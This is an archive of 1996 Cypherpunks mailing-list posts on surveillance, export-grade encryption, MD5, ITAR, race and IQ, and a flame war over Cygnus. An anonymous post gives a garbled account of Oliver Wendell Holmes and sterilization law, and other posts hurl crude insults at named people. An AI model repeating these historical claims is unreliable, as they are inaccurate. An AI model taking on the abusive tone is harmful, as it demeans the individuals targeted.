That's right, Red.   <g>

Actually, I'm not in need of persuasion regarding the subject of
evidence (anecdotal or otherwise).  I'm aware of human nature and the
frailties of intellect/psychology which can affect the results.   It's
easy to trust another's word when one does not have much knowledge of
what can go wrong or doesn't know "how to know", or how to distinguish
between fact & fancy.   It's also easy to ignore evidence even when it
is blatantly apparent, so that no amount of persuasion will convince a
person to give up a mistaken conclusion.  There are vested interests at
work in the things people do, and it is sometimes shocking to realize
that these have been at play when one wasn't expecting it, as in your
example from Richard Feynman.

That is why it is very important to always note whose interest is being
served in any sort of persuasive bit of news from any source.   A good
question to keep in mind is "what are they trying to accomplish".  

   ..
Blanc 

>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 13 Dec 1996 19:14:15 -0800 (PST)
To: John Gilmore <cypherpunks@toad.com
Subject: Re: NSA/UKUSA Echelon: Exposing the Global Surveillance System
In-Reply-To: <199612132258.OAA06522@toad.com>
Message-ID: <v03007812aed7c896a83a@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:58 PM -0800 12/13/96, John Gilmore wrote:
>I don't know the truth of this, but I'm sure it will make
>interesting reading.					-- John
>
>...
>********Hager's book "secret Power"
>       is available from CAQ for $33.*******
>http://mediafilter.org/caq
>http://www.worldmedia.com/caq



Most of the information in the article is also in "Secret Power".  A couple
of items I saw that were not mentioned:

* Most major government communication is encrypted.  New Zealand is still
able to get early warning of things like French nuclear tests via traffic
analysis.

* Singapore was part of the listening network until there was too much
publicity.  (They may again be hosting a listening post.)

* There was a listening post in Hong Kong which has been decommissioned
because of the lease expiration.  (Too bad the Brits didn't get an option
to renew :-).)


J random thoughts:

* Pooling of resources in this manner lets the taxpayer's money go further.

* NSA etc. could solve the problem of which companies to give their
commercial intelligence to by selling it to the highest bidder.  These
sales could possibly replace their current off-books funding kludge.

* As more is learned of the listening network, there is less incentive to
keep it secret, and more incentive to publicly use the intercepts.  This
incentive for secrecy has probably protected many individuals in the past.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 13 Dec 1996 16:43:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Social Security Fraud
Message-ID: <961213191851_1424786535@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems to me the government wouldn't like it because someone else (the real
owner of the SS#) would be getting the $$$. It is also fraud because this is
how the government keeps track of your workplace. Giving a wrong ss# would
lead the government to believe that person with that ss# is working two jobs
and only paying the taxes in april for one job.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.alias.net (Matthew Ghio)
Date: Fri, 13 Dec 1996 16:55:02 -0800 (PST)
To: walt@blarg.net
Subject: Re: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
In-Reply-To: <01BBE7FB.2D4DC6A0@dialup13.blarg.net>
Message-ID: <199612140049.TAA24734@myriad>
MIME-Version: 1.0
Content-Type: text/plain


walt@blarg.net (Walt Armour) wrote:
> Point 'n Crypt uses 40-bit DES-CBC (exportable), salted SHA passphrases,
> and conforms to PKCS #5 and PKCS #7.

40bit encryption isn't much security at all.  If you've got something
important enough to encrypt, then it's important enough to find a proper
encryption program.  Why would anyone buy this shit?

(That's a rhetorical question, of course; the answer is because some
people are stupid...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Fri, 13 Dec 1996 11:54:40 -0800 (PST)
To: jimg@mentat.com
Subject: Would you send money to Gary Rasmussen ?
Message-ID: <9612131954.AA28856@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain






Gary Rasmussen (RagyR@aol.com) replies to me as below:

Have people got a view on the second question ?   I've had
no contact with Gary before and he may very well be honest;
but there's proper trust and there's stupidity.

   >    Hi Peter,
   >    
   >    >  I'm looking for Kahn's book. Have you an acccurate price now?
   >    
   >    A lot of copies (about 100) have been sold since ....
   >    
   >    
   >    >  (And is there anyone I'd know who'd suggest I send you money ?!)
   >    
   >    Good question, but very hard to answer since I don't know who you
   >    know. Can tell you that I operate Classical Crypto Books primarily as
   >    a service for other members of the ACA. Two possible references are
   >    the current and past ACA presidents:
   >    
   >    jimg@mentat.com (Jim Gillogly, ACA President 1996-1998)
   >    75542.1003@CompuServe.COM (Randy Nichols, ACA President 1994-1996)
   >    
   >    Operating CCB is not my main occupation (by day I'm a scientist working
   >    for MIT's Lincoln Lab). Can also say proudly that in 1.5 years of operating
   >    CCB I haven't had any complaints.
   >    
   >    Please let me know if you have other questions or would like a complete
   >    copy of the CCB catalog.
   >    
   >    Best Wishes,
   >    Gary Rasmussen
   >    Classical Crypto Books




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Fri, 13 Dec 1996 17:15:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Neural Nets
In-Reply-To: <3.0.32.19961212164107.006c0ea0@best.com>
Message-ID: <199612140109.UAA24830@myriad>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:

> This comes up once in a while --- it appears an inappropriate approach,
> they say, since the solution space for the problem consists of exactly
> one spike, in the vast sea of all possible solutions ... there is no
> smooth contour over which to minimize the net's error function, and
> finding the one spike which is the correct result is no more efficient
> in such a case than any other exhaustive search.
> 
> This argument would break down if there were detectable biases in the
> crypto algorithm that you could exploit.  But then whether a nn would
> be the tool of choice in such a case may be uncertain.

Detecting and exploting biases of encrypted bits vs plaintext bits is the
basis of many well-known techniques which are known as differential and
linear cryptanalysis.  I think it would certainly be possible to perform
differential cryptanalysis via an evolutionary algorithm which looked for
correlations and favored those which were statistically more likely.
Of course, any well-designed algorithm should make it take an impractically
large number of iterations to discover any useful relations, but the
technique would probably work pretty well against common snakeoil.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 13 Dec 1996 20:24:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Race and IQ
In-Reply-To: <32B03E27.5EF9@gte.net>
Message-ID: <v03007800aed7dc316131@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM -0600 12/12/96, Igor Chudov @ home wrote:

>All this "environment" stuff is rather easy to test and control for: take
>two groups of children -- one from one race, another from another race,
>who live in essentially the same conditions. Then compare the average IQs
>and check statistical validity of your samples.
>
>There was one study. They took a number of white adopted children and a
>number of black adopted children, and made sure that they controlled for
>other conditions such as adopted parents' income, etc.
>
>Guess what was the result of IQ tests of children?

Ah, but the rub is factoring in cultural factors which remain. As an
example, a black child raised under similar socioeconomic conditions to,
say, a Jewish or Chinese child will still be to some extent a product of
his culture.

(In fact, even a black child raised in a white neighborhood by adoptive
white parents will still have some a different learning experience than a
white child raised in the same environment. If not initially, eventually.)

I'm not saying this to "defend" any particular ethnic or racial group in
this IQ debate, just to point out that cultural factors are not so easily
separable in the way Igor describes.

(For the curious, I am persuaded that there are minimal differences in
"intelligence" between the several or many races, but that cultural and
sociological factors strongly affect upbringing, learning, interest in
doing well in school, ability on standardized tests, success in business
matters, and so on.)

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 13 Dec 1996 18:21:07 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Java DES breaker?
In-Reply-To: <NmquyD154w165w@bwalk.dm.com>
Message-ID: <199612140240.UAA02300@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Vulis wrote:
> More than one person writes:
> > Vulis wrote:
> > > It would be very foolish to touch any shit that comes out of Cygnus.
> >      Why? (specifically, I am about to try using a GCC port to WinNT, and
> > I would like to know _why_ you think their work is shit).

> First, because it's King John "Lackbrain" Gilmore's company. :-)

     That doesn't say anything about the quality of their work. 

> Second, because they hire unqualified people (rather, people whose
> qualifications have nothing to do with the job) and they've already
> fucked up every project they've ever touched.

     Given your statements about Gilmore, can you provide any specifics
about individuals lack of competence in a given area? 

> Third, because they steal from the people who originally developed the
> free software by charging money for the non-existent "support".

     How is this "stealing"? The GNU license explicitly (IIRC) allows
this, and it doesn't take anything _away_ from the developer. I don't 
see how it is stealing. 

> I'm quite happy with MS VC++ for NT. I doubt that Cygnus can do a good job

     Where can I download MS VC++ (Microsoft, now there is a company with a 
marvelous reputation for sterling products.) for the cost of my Internet 
connection? 

> porting gcc to NT. People much better than the assholes at Cygnus have not
> done a great job porting gcc to OS/2. If I want gcc, I just run it on the
> Linux box, or a Sun box.

     I already use Linux, and I need to learn NT, so I would like to have 
a compiler, and I can't afford one. It would be nice to be able to learn
one compiler that works under both platforms. I don't do enough programming
to be able to justify MS VC++, and I don't have piles of cash hanging around
waiting for me to throw them at Satan. 

> Fuck Cygnus.

     Fuck Shrinkwrapped software. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 13 Dec 1996 21:15:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Magic Numbers in MD5
Message-ID: <v02140b01aed7e51544ac@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I am curious where some of the magic numbers in MD5 originated.

First, we have the four chaining variables, A, B, C, and D which
are initialized with apparently random numbers.  Are they as
random as they look, or are they carefully chosen?

Second, we have the t_i values.  Schneier's first edition says this:

"In step i, t_i is the integer part of 4294967296xabs(sin(i)), when
i is in radians.  (Note that 4294967296 is 2^32.)"

Does abs(sin()) have some properties that are especially conducive to
strengthening MD5 or is it just a function to generate mildly random
numbers?  If the latter, wouldn't the algorithm be stronger if it was
used with completely random numbers?

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 13 Dec 1996 19:10:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <199612140240.UAA02300@smoke.suba.com>
Message-ID: <yVNwyD180w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > > It would be very foolish to touch any shit that comes out of Cygnus.
> > >      Why? (specifically, I am about to try using a GCC port to WinNT, and
> > > I would like to know _why_ you think their work is shit).
>
> > First, because it's King John "Lackbrain" Gilmore's company. :-)
>
>      That doesn't say anything about the quality of their work.

It does. John Gilmore is a proven liar. He has no credibility.

> > Second, because they hire unqualified people (rather, people whose
> > qualifications have nothing to do with the job) and they've already
> > fucked up every project they've ever touched.
>
>      Given your statements about Gilmore, can you provide any specifics
> about individuals lack of competence in a given area?

They lack competence in all areas except cocksucking.

> > Third, because they steal from the people who originally developed the
> > free software by charging money for the non-existent "support".
>
>      How is this "stealing"? The GNU license explicitly (IIRC) allows
> this, and it doesn't take anything _away_ from the developer. I don't
> see how it is stealing.

John Gilmore rips off software authors. I don't care what the copyleft says.
Gilmore is a crook.

> > I'm quite happy with MS VC++ for NT. I doubt that Cygnus can do a good job
>
>      Where can I download MS VC++ (Microsoft, now there is a company with a
> marvelous reputation for sterling products.) for the cost of my Internet
> connection?

Given your brazen disregard for the software authors, and general lack of
ethics, you probably have an illegal copy already.

Microsoft sucks. I've had plenty of terrible experience with them trying
to rip me off. John Gilmore is worse.

> > porting gcc to NT. People much better than the assholes at Cygnus have not
> > done a great job porting gcc to OS/2. If I want gcc, I just run it on the
> > Linux box, or a Sun box.
>
>      I already use Linux, and I need to learn NT, so I would like to have
> a compiler, and I can't afford one. It would be nice to be able to learn
> one compiler that works under both platforms. I don't do enough programming
> to be able to justify MS VC++, and I don't have piles of cash hanging around
> waiting for me to throw them at Satan.

If you don't do much programming, then you can a) use a DOS C compiler,
b) use Perl for NT (free from Microsoft; not that I like Perl), c) use
Visual Basic, d) byte the bullet and invest in the compiler from the same
company that wrote the OS. If you want to learn NT system APIs, graphics
APIs, etc, then you probably can't even call them from gcc reliably.

> > Fuck Cygnus.
>
>      Fuck Shrinkwrapped software.

Fuck John Gilmore.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 13 Dec 1996 12:57:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: THE CRYPTOCRACY'S PLAN TO PSYCHOCIVILIZE YOU
Message-ID: <199612132057.VAA00967@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.nwlink.com:88/~dbader/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 13 Dec 1996 19:10:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ASM vs portable code [WAS: Re: Java DES breaker?]
In-Reply-To: <199612131527.HAA07125@cygnus.com>
Message-ID: <LTowyD181w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Peter Trei" <trei@process.com> writes:

> While I'm reluctant to ever find myself in the same corner as
> Vulis, ...

Don't worry, you're not.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Dec 1996 19:09:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: CPU_two
Message-ID: <1.5.4.32.19961214030601.00688d48@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 12-13-96

 "A hardware device may offer a solution to software virus
 problems" 

 Calluna, a Scottish disc drive company, has developed a 
 hardware product which it believes offers computers complete 
 protection against viruses. It consists of a microprocessor 
 on a small circuit board which is placed between the PC's 
 hard disc drive and its system board, and which functions 
 independently of the PC's own CPU as a second CPU. The 
 microprocessor can be programmed to monitor all traffic being 
 routed to the PC's hard disc drive. If it detects virus-like 
 activity or any other illegal activity it alerts the user and 
 allows the option of blocking access to the hard disc drive.

 The second CPU could also be allocated partitioned sections
 of the computer's hard drive to store all material
 downloaded from the Internet. Or the device could be used 
 as a firewall to prevent unauthorised access to the PC's 
 hard drive.

 [Might this have crypto use?]

-----

 CPU_two





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walt Armour <walt@blarg.net>
Date: Fri, 13 Dec 1996 22:43:29 -0800 (PST)
To: "'Matthew Ghio'" <ghio@myriad.alias.net>
Subject: RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
Message-ID: <01BBE945.3B9BC4A0@dialup36.blarg.net>
MIME-Version: 1.0
Content-Type: text/plain


There is no arguing that 40 bits is strong security.  I agree with that.

But we (Soundcode, and anyone else in the business of crypto) have to also 
look at things from the standpoint of market share and market size. 
 Exportability directly affects market size and weighs in fairly heavily. 
 (Which is why ITAR (oops, Commerce) restrictions bite).  Which is why the 
current offering is 40 bits.

As for security, the current release of PnC is primarily targetting 
privacy, not security.  They are two very similar but different approaches. 
 40 bits is sufficient to encrypt files and keep them away from friends, 
family and coworkers (unless you work at the NSA).  The point of Point 'n 
Crypt is to attempt to make encryption technology easily useable and 
widespread.  If anything you have is of such a nature that 40 bits isn't 
enough protection then by all means don't use PnC (at least not this 
version :).

As for your final point, I agree, some people are stupid.  But part of the 
purpose of being a cypherpunk (and SoundCode) is to educate those that can 
be educated.  Sometimes education just has to take pretty small steps...

later,
walt

----------
From: 	Matthew Ghio[SMTP:ghio@myriad.alias.net]
Sent: 	Friday, December 13, 1996 4:49 PM
To: 	walt@blarg.net
Cc: 	cypherpunks@toad.com
Subject: 	Re: !! Point 'n Crypt -- Win95 Privacy for Everyone !!

walt@blarg.net (Walt Armour) wrote:
> Point 'n Crypt uses 40-bit DES-CBC (exportable), salted SHA passphrases,
> and conforms to PKCS #5 and PKCS #7.

40bit encryption isn't much security at all.  If you've got something
important enough to encrypt, then it's important enough to find a proper
encryption program.  Why would anyone buy this shit?

(That's a rhetorical question, of course; the answer is because some
people are stupid...)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 13 Dec 1996 22:37:18 -0800 (PST)
To: Adam Shostack <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ITARs effects
Message-ID: <3.0.32.19961213222456.006b3248@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM 12/13/96 -0500, Adam Shostack wrote:
>This implies that putting something up for FTP == export. Holy
>shit.

Sure. What did you expect?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 13 Dec 1996 22:37:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [Privacy] Airline background checks...
Message-ID: <3.0.32.19961213223437.006bd61c@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 12/13/96 -0800, aaron@herringn.com wrote:
>
>WASHINGTON (CNN) -- Under plans to overhaul the airline security system,
>making a plane reservation would trigger an instant profile of a
>passenger's background, including past travels and possible criminal
>history information.
>
>[...]
>
>Government should pay

Just in case that somebody isn't clear as to what "government should pay"
means. It means you and I through out taxes.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 13 Dec 1996 22:43:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Race and IQ
Message-ID: <199612140643.WAA32553@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 8:30 PM 12/13/1996, Timothy C. May wrote:
>(For the curious, I am persuaded that there are minimal differences
>in "intelligence" between the several or many races, but that
>cultural and sociological factors strongly affect upbringing,
>learning, interest in doing well in school, ability on standardized
>tests, success in business matters, and so on.)

The question is certainly interesting scientifically.  Some Africans
exhibit skills which are not found elsewhere.  For example, in some
African societies, I am told, there are people who can do things like
play a drum with the left hand to 13 beats a measure and do something
like 17 beats a measure with the right hand.  Those who aren't amazed
by this should try doing three beats on the left hand with two on the
right.  Call me when you master it.  ;-)

If you lived in a society where this skill was considered an important
component of social success, most of us would appear to be retarded.
(Consider, for example, the ancient Chinese civilization.  Appointment
into the imperial bureaucracy occured only after the applicants passed
elaborate tests regarding their knowledge and interpretation of
poetry.  That was the entire qualification.)

It has been claimed that African societies have never been "civilized"
in the sense of developing large bureaucracies and cities.  When many
people make this claim there is an implication that the more with it
peoples did this.  But is that so reasonable?  Read reports of life in
European cities in the 18th century, before running water and before
sewage systems.  Give me the country any day!

Many of the readers of this list are anarchistically inclined.  When
we hear that African societies have tended to be anarchistic, we
should applaud their wisdom and insight.  Perhaps these people could
teach the rest of us a few things.  (And maybe teach Hilary Clinton a
few things.  Is there a history of welfare states in Africa, or did
they practice voluntary anarchistic communal charity on the level of
villages?)

It is not out of the question that once the human genome is decoded
and its relationship with human intelligence understood that we will
find that Africans beat out everyone else.

(Incidentally, I question the claim that African societies never
developed cities and bureacracies.  The Egyptians are the most
prominent example.  Mathematically adept and literate they prospered
for a couple thousand years.  A better run than the Romans managed!
We tend to think of Egyptians as being sort of like Europeans.  I
believe this is because Europeans invented Egyptology.  Excuse me for
pointing out the obvious, but Egypt is in Africa.  What is more, if
you study Egyptian statuary, you will find many examples of distinctly
African looking royalty.  Also, I know that cities like Timbuktoo were
centers of Muslim learning and were large enough to have streets and
houses.  We may know little about them because Europeans were not
allowed to visit, and also for racist reasons.)

Scientific questions aside, it isn't clear why the racial link to
intelligence matters.  What are we going to do differently if it turns
out that, on average, for genetic reasons, Albanians are less quick on
the uptake than other people?

The link between intelligence and success is not at all clear.  We
generally consider mathematicians and computer programmers to be
smart, but in terms of total life competence, large numbers of these
people live less than ideally.

There are many instances in which I prefer to hire somebody who is
less intelligent, but better equipped to play on the team, better
organized, or just less of a primadonna.

The eugenicists propose murder.  This doesn't make any sense at all.
We all have friends who are both smarter and dumber than ourselves,
yet we don't plot their murder.  Intelligence is just an excuse for
what these people really want to do.  If God came down and told us
that there was no genetic basis for intelligence, next week there
would be some other reason for the same policy.

On the flip side are those who want to help the unfortunate with the
time and labor of others.  A racial link to intelligence will not
increase my sympathy for such schemes.

The upshot is: If you respect the rights of others, it doesn't matter.

Now for some entertainment.

Oliver Wendell Holmes, when he was a judge in Virginia, ordered the
forcible sterilization of several young women.  The state would wait
until they became ill and then when they were admitted to a hospital,
they were sterilized under the guise of giving them some other
operation.

Holmes claimed that the grandmothers of the women were imbeciles,
their mothers were imbeciles, and that they were imbeciles.  His great
line was "Three generations of imbeciles are enough!"

Curiously, it turns out that the word "imbecile" was a euphemism for
"illegitimate".

Know your doctor!

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 13 Dec 1996 23:17:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: [No joke] The Feds may legally gas us
Message-ID: <3.0.32.19961213231550.00698d18@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,
Did you know that the Feds may legally test chemical and biological weapons
on the civilian population as long as they give 30 days advance notice to
the local bigwigs (so they can get themselves and their families out of the
danger zone)?

This is not a joke. It is in the United States Code.


>Return-Path: <ca-firearms-errors@lists.best.com>
>From: JT McBride <James.McBride@GDEsystems.COM>
>Subject: Under color of Law
>Date: Fri, 13 Dec 1996 05:34:55 -0800
>BestServHost: lists.best.com
>Sender: ca-firearms-errors@lists.best.com
>Errors-To: ca-firearms-errors@lists.best.com
>To: ca-firearms@lists.best.com
>
>
>I just heard about this on Art Bell's program, but this is United States
>Code, Title 50, section 1520. Under the NBC program, our government has
>the 'legal' right to gas us. This ought to be all the proof we need that
>what is "lawful" isn't necessarily.
>
>If we can be gassed, why can't we be disarmed?
>
>There are rights that transcend "law". I'd say LIFE is one, and the need
>for self-defense against tyranny should be clear.
>
>>From the Cornell Law Library:
> [Credits and Conditions]    [Structure]   [Your Comments]
>
>   * UNITED STATES CODE
>        o TITLE 50 - WAR AND NATIONAL DEFENSE
>             + CHAPTER 32 - CHEMICAL AND BIOLOGICAL WARFARE PROGRAM
>
>----------------------------------------------------------------------------
>
>§ 1520. Use of human subjects for testing of chemical or biological agents
>by Department of Defense; accounting to Congressional committees with
>respect to experiments and studies; notification of local civilian officials
>
>   * (a) Not later than thirty days after final approval within the
>     Department of Defense of plans for any experiment or study to be
>     conducted by the Department of Defense, whether directly or under
>     contract, involving the use of human subjects for the testing of
>     chemical or biological agents, the Secretary of Defense shall supply
>     the Committees on Armed Services of the Senate and House of
>     Representatives with a full accounting of such plans for such
>     experiment or study, and such experiment or study may then be conducted
>     only after the expiration of the thirty-day period beginning on the
>     date such accounting is received by such committees.
>   * (b)
>        o (1) The Secretary of Defense may not conduct any test or
>          experiment involving the use of any chemical or biological agent
>          on civilian populations unless local civilian officials in the
>          area in which the test or experiment is to be conducted are
>          notified in advance of such test or experiment, and such test or
>          experiment may then be conducted only after the expiration of the
>          thirty-day period beginning on the date of such notification.
>        o (2) Paragraph (1) shall apply to tests and experiments conducted
>          by Department of Defense personnel and tests and experiments
>          conducted on behalf of the Department of Defense by contractors.
>
>----------------------------------------------------------------------------
> [Previous Section]    [Next Section]
>
> [Overview]
>
>----------------------------------------------------------------------------
>This HTML is automatically generated. A product of the Legal Information
>Institute
>shelden
>
>
>Jim
>The "Assault Weapons" ban is drive-by legislation. The target: Crime;
>the victimized innocent bystander: the lawfully armed Citizen.
>     ~*~*~ Tyranny Insurance by Colt's Manufacturing Cos. ~*~*~
>
>

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 13 Dec 1996 23:32:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Personal Reputation, was Re: Java DES breaker?
In-Reply-To: <199612140240.UAA02300@smoke.suba.com>
Message-ID: <v03007815aed8074e6636@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM -0800 12/13/96, Dr.Dimitri Vulis KOTM wrote:
>It does. John Gilmore is a proven liar. He has no credibility.

John will be a much later addition to my killfile than you.  This is
because everything he posts is interesting.  Much of what you post is
personal attack and, as such, uninteresting.  (N.B. aga is the only person
I send directly to the trash at present.)


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Psionic Damage <zerofaith@mail.geocities.com>
Date: Fri, 13 Dec 1996 23:36:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: new homepage
Message-ID: <199612140736.XAA25635@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out This homepage, it's definitely under construction. 
www.geocities.com/SiliconValley/Heights/2608/
----------------------------------------------------------------------------
----------------------------------------------------------------------------
----------------------
Zer0 Faith Inc. H/P/A/V/C UNDER-WORLD
www.geocities.com/SiliconValley/Heights/2608

MEMBERZ:

GATEMASTER, VIRIZZ, KRASH, EVIL TWIN, KORRUPT, PHONEHAZORD, PSIONIC DAMAGE,
ORPHEUS (the pirate), MANTICORE, ERADICATOR, PSYCHODROME, BIONIC SMURF,
SONIK, §ILVER KAT, kOBRA, & KRYPTIK!

EMAIL:zerofaith@nlights.net (headquarterz) hakker1@hotmail.com (Delious's
Haus!) hackerz@juno.com (The Gatemaster'z palace) zerofaith@geocities.com
(delivery/help/requests/suggestions)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 13 Dec 1996 21:59:54 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Race and IQ
In-Reply-To: <v03007800aed7dc316131@[207.167.93.63]>
Message-ID: <199612140552.XAA22907@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> 
> At 10:31 PM -0600 12/12/96, Igor Chudov @ home wrote:
> 
> >All this "environment" stuff is rather easy to test and control for: take
> >two groups of children -- one from one race, another from another race,
> >who live in essentially the same conditions. Then compare the average IQs
> >and check statistical validity of your samples.
> >
> >There was one study. They took a number of white adopted children and a
> >number of black adopted children, and made sure that they controlled for
> >other conditions such as adopted parents' income, etc.
> >
> >Guess what was the result of IQ tests of children?
> 
> Ah, but the rub is factoring in cultural factors which remain. As an
> example, a black child raised under similar socioeconomic conditions to,
> say, a Jewish or Chinese child will still be to some extent a product of
> his culture.
> 
> (In fact, even a black child raised in a white neighborhood by adoptive
> white parents will still have some a different learning experience than a
> white child raised in the same environment. If not initially, eventually.)
> 
> I'm not saying this to "defend" any particular ethnic or racial group in
> this IQ debate, just to point out that cultural factors are not so easily
> separable in the way Igor describes.
> 
> (For the curious, I am persuaded that there are minimal differences in
> "intelligence" between the several or many races, but that cultural and
> sociological factors strongly affect upbringing, learning, interest in
> doing well in school, ability on standardized tests, success in business
> matters, and so on.)
> 

A good point. I personally think that whatever we find -- whether there
are genetic differences or not -- is not terribly important since one
can make the most money by judging individual people by their merit.

It is an interesting academic question, but for a businessman (absent
anti-discrimination laws) it is not very relevant.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 14 Dec 1996 01:09:42 -0800 (PST)
To: nobody@cypherpunks.ca
Subject: Re: Wired Integrity
In-Reply-To: <199612140137.RAA20020@cypherpunks.ca>
Message-ID: <Pine.SUN.3.91.961214005601.12982B-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 13 Dec 1996 nobody@cypherpunks.ca wrote:

> Wired should have appended a short paragraph explaining the
> possible conflict of interest.

I agree.  It was an editorial decision, of course, but I think
